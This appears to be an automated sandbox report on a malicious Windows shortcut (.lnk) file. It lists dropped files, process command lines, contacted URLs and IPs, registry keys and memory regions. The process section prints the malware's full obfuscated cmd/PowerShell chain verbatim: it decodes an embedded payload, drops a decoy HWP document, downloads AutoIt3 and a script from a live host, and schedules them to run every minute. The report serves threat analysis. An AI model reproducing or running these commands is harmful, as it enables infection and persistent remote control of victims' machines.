Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
knfV5IVjEV.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has command line arguments,
Icon number=0, Archive, ctime=Mon Dec 25 10:39:35 2023, mtime=Mon Apr 8 13:10:10 2024, atime=Mon Dec 25 10:39:35 2023, length=245248,
window=hidenormalshowminimized
|
initial sample
|
 |
|
|
C:\GSlLzFnTov\GSlLzFnTov.exe
|
PE32+ executable (console) x86-64, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hbsi0lfi.m4s.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_izk42yes.vps.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ltnleziw.dj4.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q4mfwfxv.t0x.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\Desktop\knfV5IVjEV
|
Hangul (Korean) Word Processor File 5.x
|
dropped
|
||
|
\Device\ConDrv
|
ASCII text, with CR, LF line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ||goto&po^w^e^rs^he^l^l
-windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object{$_.length
-eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;if($zPedYniBfy.length
-eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object
-ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return
$zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0;
$nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^&
$oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir
c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov
-k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1
& sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object{$_.length
-eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;if($zPedYniBfy.length
-eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object
-ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return
$zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0;
$nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;&
$oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ||goto&po^w^e^rs^he^l^l
-windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object{$_.length
-eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;if($zPedYniBfy.length
-eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object
-ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return
$zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0;
$nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^&
$oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir
c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov
-k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1
& sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object{$_.length
-eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;if($zPedYniBfy.length
-eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object
-ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return
$zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0;
$nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;&
$oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;
|
|
|
|
C:\Windows\System32\attrib.exe
|
attrib +h c:\GSlLzFnTov
|
|
|
|
C:\GSlLzFnTov\GSlLzFnTov.exe
|
GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0
|
|
|
|
C:\GSlLzFnTov\GSlLzFnTov.exe
|
GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1
|
|
|
|
C:\Windows\System32\schtasks.exe
|
schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
|
|
|
|
C:\Windows\System32\attrib.exe
|
attrib +h c:\GSlLzFnTov
|
|
|
|
C:\GSlLzFnTov\GSlLzFnTov.exe
|
GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0
|
|
|
|
C:\GSlLzFnTov\GSlLzFnTov.exe
|
GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1
|
|
|
|
C:\Windows\System32\schtasks.exe
|
schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 4 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
https://go.micro
|
unknown
|
|
|
|
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago
|
unknown
|
|
|
|
https://jethropc.com/wp-admin/css/temp/hurry/?rv=
|
unknown
|
|
|
|
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0jethropc.com
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://curl.se/libcurl/c/curl_easy_setopt.html
|
unknown
|
||
|
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0rz
|
unknown
|
||
|
https://curl.se/docs/http-cookies.html
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1Pu_
|
unknown
|
||
|
http://www.microsoft.co
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1e
|
unknown
|
||
|
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0jethropc.com##
|
unknown
|
||
|
https://curl.se/docs/sslcerts.html
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://curl.se/docs/sslcerts.htmlcurl
|
unknown
|
||
|
https://curl.se/docs/hsts.html
|
unknown
|
||
|
https://curl.se/docs/copyright.htmlD
|
unknown
|
||
|
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1T
|
unknown
|
||
|
https://curl.se/
|
unknown
|
||
|
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0wz
|
unknown
|
||
|
https://curl.se/docs/copyright.html
|
unknown
|
||
|
https://curl.se/docs/hsts.html#
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1jethropc.com##O
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0%
|
unknown
|
||
|
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1ji2
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://curl.se/P
|
unknown
|
||
|
https://curl.se/docs/http-cookies.html#
|
unknown
|
||
|
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1jethropc.comqu
|
unknown
|
||
|
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0
|
162.241.216.65
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1
|
162.241.216.65
|
||
|
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1y
|
unknown
|
There are 29 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
jethropc.com
|
162.241.216.65
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
162.241.216.65
|
jethropc.com
|
United States
|
|
|
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
|
SlowContextMenuEntries
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
|
SlowContextMenuEntries
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7FF7C13E0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C11ED000
|
trusted library allocation
|
page execute and read and write
|
||
|
2630F820000
|
heap
|
page read and write
|
||
|
2630F650000
|
heap
|
page read and write
|
||
|
7FF700E9E000
|
unkown
|
page readonly
|
||
|
1EFDF9D8000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1410000
|
trusted library allocation
|
page read and write
|
||
|
24D89B8A000
|
heap
|
page read and write
|
||
|
1C4E4740000
|
remote allocation
|
page read and write
|
||
|
7FF7C1540000
|
trusted library allocation
|
page read and write
|
||
|
93D98FF000
|
stack
|
page read and write
|
||
|
914967E000
|
stack
|
page read and write
|
||
|
1EFE0F3F000
|
trusted library allocation
|
page read and write
|
||
|
7FF700E9E000
|
unkown
|
page readonly
|
||
|
2630F810000
|
trusted library allocation
|
page read and write
|
||
|
1EFDD8E7000
|
heap
|
page read and write
|
||
|
7FF7C1400000
|
trusted library allocation
|
page read and write
|
||
|
1EFDD8E5000
|
heap
|
page read and write
|
||
|
7FF7F1DEE000
|
unkown
|
page readonly
|
||
|
1EFDD8EB000
|
heap
|
page read and write
|
||
|
26329A30000
|
heap
|
page read and write
|
||
|
26311170000
|
heap
|
page read and write
|
||
|
7FF7C125C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF7C14D0000
|
trusted library allocation
|
page read and write
|
||
|
2AD152F0000
|
heap
|
page read and write
|
||
|
24D89B9A000
|
heap
|
page read and write
|
||
|
2630F7D0000
|
trusted library allocation
|
page read and write
|
||
|
26329770000
|
heap
|
page read and write
|
||
|
263120E8000
|
trusted library allocation
|
page read and write
|
||
|
2630F5B0000
|
heap
|
page read and write
|
||
|
7FF7F1D90000
|
unkown
|
page readonly
|
||
|
C6F64FF000
|
stack
|
page read and write
|
||
|
7FF7C13F0000
|
trusted library allocation
|
page read and write
|
||
|
1EFDD8E0000
|
heap
|
page read and write
|
||
|
1EFF77B0000
|
heap
|
page read and write
|
||
|
7FF7C1480000
|
trusted library allocation
|
page read and write
|
||
|
C6462F9000
|
stack
|
page read and write
|
||
|
7FF7C13E0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C11B0000
|
trusted library allocation
|
page read and write
|
||
|
C6F62FC000
|
stack
|
page read and write
|
||
|
C6464FF000
|
stack
|
page read and write
|
||
|
7FF7C1260000
|
trusted library allocation
|
page execute and read and write
|
||
|
263214C1000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C11A0000
|
trusted library allocation
|
page read and write
|
||
|
93D951D000
|
stack
|
page read and write
|
||
|
C645C83000
|
stack
|
page read and write
|
||
|
7FF7C1351000
|
trusted library allocation
|
page read and write
|
||
|
C6461FE000
|
stack
|
page read and write
|
||
|
7FF7F1E0F000
|
unkown
|
page write copy
|
||
|
35AF7FE000
|
stack
|
page read and write
|
||
|
1C4E4510000
|
heap
|
page read and write
|
||
|
24D89B6C000
|
heap
|
page read and write
|
||
|
1EFF77B8000
|
heap
|
page read and write
|
||
|
7FF7F1E10000
|
unkown
|
page readonly
|
||
|
7FF7F1D90000
|
unkown
|
page readonly
|
||
|
C6466FC000
|
stack
|
page read and write
|
||
|
2630F4D0000
|
heap
|
page read and write
|
||
|
22C40960000
|
remote allocation
|
page read and write
|
||
|
1EFDD810000
|
heap
|
page read and write
|
||
|
26329676000
|
heap
|
page read and write
|
||
|
2630F7D2000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1510000
|
trusted library allocation
|
page read and write
|
||
|
24D89B66000
|
heap
|
page read and write
|
||
|
1EFDF2A0000
|
trusted library allocation
|
page read and write
|
||
|
2630F750000
|
trusted library allocation
|
page read and write
|
||
|
2AD15306000
|
heap
|
page read and write
|
||
|
7FF7C11A2000
|
trusted library allocation
|
page read and write
|
||
|
7FF700EC0000
|
unkown
|
page readonly
|
||
|
1EFF7AE0000
|
heap
|
page read and write
|
||
|
7FF700E41000
|
unkown
|
page execute read
|
||
|
914935E000
|
stack
|
page read and write
|
||
|
1EFDF686000
|
heap
|
page read and write
|
||
|
1EFF7B59000
|
heap
|
page read and write
|
||
|
22C40A0A000
|
heap
|
page read and write
|
||
|
2AD152E0000
|
remote allocation
|
page read and write
|
||
|
7FF7C1342000
|
trusted library allocation
|
page read and write
|
||
|
24D89AA0000
|
heap
|
page read and write
|
||
|
914987E000
|
stack
|
page read and write
|
||
|
22C409D8000
|
heap
|
page read and write
|
||
|
7FF700E40000
|
unkown
|
page readonly
|
||
|
263296F0000
|
heap
|
page read and write
|
||
|
1EFDD8E9000
|
heap
|
page read and write
|
||
|
2AD1530E000
|
heap
|
page read and write
|
||
|
7FF7C1530000
|
trusted library allocation
|
page read and write
|
||
|
1EFDD870000
|
heap
|
page read and write
|
||
|
7FF7C1440000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1430000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C14E0000
|
trusted library allocation
|
page read and write
|
||
|
1C4E454A000
|
heap
|
page read and write
|
||
|
2AD15329000
|
heap
|
page read and write
|
||
|
1EFF7987000
|
heap
|
page execute and read and write
|
||
|
1C4E4573000
|
heap
|
page read and write
|
||
|
24D89B9B000
|
heap
|
page read and write
|
||
|
7FF700EBF000
|
unkown
|
page write copy
|
||
|
7FF7C1460000
|
trusted library allocation
|
page read and write
|
||
|
1EFDD935000
|
heap
|
page read and write
|
||
|
26313359000
|
trusted library allocation
|
page read and write
|
||
|
26329614000
|
heap
|
page read and write
|
||
|
7FF7C1420000
|
trusted library allocation
|
page read and write
|
||
|
24D89BCE000
|
heap
|
page read and write
|
||
|
7FF7C12C6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF7C1400000
|
trusted library allocation
|
page read and write
|
||
|
1EFDF839000
|
trusted library allocation
|
page read and write
|
||
|
2631109D000
|
heap
|
page read and write
|
||
|
26313678000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1390000
|
trusted library allocation
|
page execute and read and write
|
||
|
93D99FF000
|
stack
|
page read and write
|
||
|
24D89B9B000
|
heap
|
page read and write
|
||
|
7FF7F1D91000
|
unkown
|
page execute read
|
||
|
2AD1530C000
|
heap
|
page read and write
|
||
|
22C40960000
|
remote allocation
|
page read and write
|
||
|
7FF7F1E0F000
|
unkown
|
page read and write
|
||
|
1EFE0627000
|
trusted library allocation
|
page read and write
|
||
|
24D89B8A000
|
heap
|
page read and write
|
||
|
1C4E4740000
|
remote allocation
|
page read and write
|
||
|
22C40940000
|
heap
|
page read and write
|
||
|
26312AE8000
|
trusted library allocation
|
page read and write
|
||
|
263130A9000
|
trusted library allocation
|
page read and write
|
||
|
2AD1533C000
|
heap
|
page read and write
|
||
|
1C4E455D000
|
heap
|
page read and write
|
||
|
7FF7C1470000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C14D0000
|
trusted library allocation
|
page read and write
|
||
|
1EFF7B38000
|
heap
|
page read and write
|
||
|
2AD152F8000
|
heap
|
page read and write
|
||
|
91498F8000
|
stack
|
page read and write
|
||
|
7FF7C1500000
|
trusted library allocation
|
page read and write
|
||
|
24D89B70000
|
heap
|
page read and write
|
||
|
2630F790000
|
heap
|
page readonly
|
||
|
C64647B000
|
stack
|
page read and write
|
||
|
7FF7C13A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF7C13F0000
|
trusted library allocation
|
page read and write
|
||
|
1EFF77DE000
|
heap
|
page read and write
|
||
|
1EFF7980000
|
heap
|
page execute and read and write
|
||
|
7FF7F1DEE000
|
unkown
|
page readonly
|
||
|
1EFF7AB0000
|
heap
|
page execute and read and write
|
||
|
7FF7C12C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
914A68E000
|
stack
|
page read and write
|
||
|
24D89B8A000
|
heap
|
page read and write
|
||
|
22C409E5000
|
heap
|
page read and write
|
||
|
9149CBB000
|
stack
|
page read and write
|
||
|
7FF7C1420000
|
trusted library allocation
|
page read and write
|
||
|
1EFF7B66000
|
heap
|
page read and write
|
||
|
7FF700E9E000
|
unkown
|
page readonly
|
||
|
2630F5F0000
|
heap
|
page read and write
|
||
|
26329790000
|
heap
|
page read and write
|
||
|
7FF7C1440000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1290000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C13C0000
|
trusted library allocation
|
page read and write
|
||
|
2630F63E000
|
heap
|
page read and write
|
||
|
2AD15386000
|
heap
|
page read and write
|
||
|
1EFDDC15000
|
heap
|
page read and write
|
||
|
914993F000
|
stack
|
page read and write
|
||
|
263116E8000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1470000
|
trusted library allocation
|
page read and write
|
||
|
7FF700E41000
|
unkown
|
page execute read
|
||
|
2AD15354000
|
heap
|
page read and write
|
||
|
7FF7F1DEE000
|
unkown
|
page readonly
|
||
|
2AD15386000
|
heap
|
page read and write
|
||
|
26329870000
|
heap
|
page read and write
|
||
|
7FF7C1410000
|
trusted library allocation
|
page read and write
|
||
|
7FF700E9E000
|
unkown
|
page readonly
|
||
|
22C40A67000
|
heap
|
page read and write
|
||
|
2630F780000
|
heap
|
page execute and read and write
|
||
|
AACEAFF000
|
stack
|
page read and write
|
||
|
26311544000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C11E3000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EFDF330000
|
heap
|
page read and write
|
||
|
7FF7C13A0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1300000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C4E452E000
|
heap
|
page read and write
|
||
|
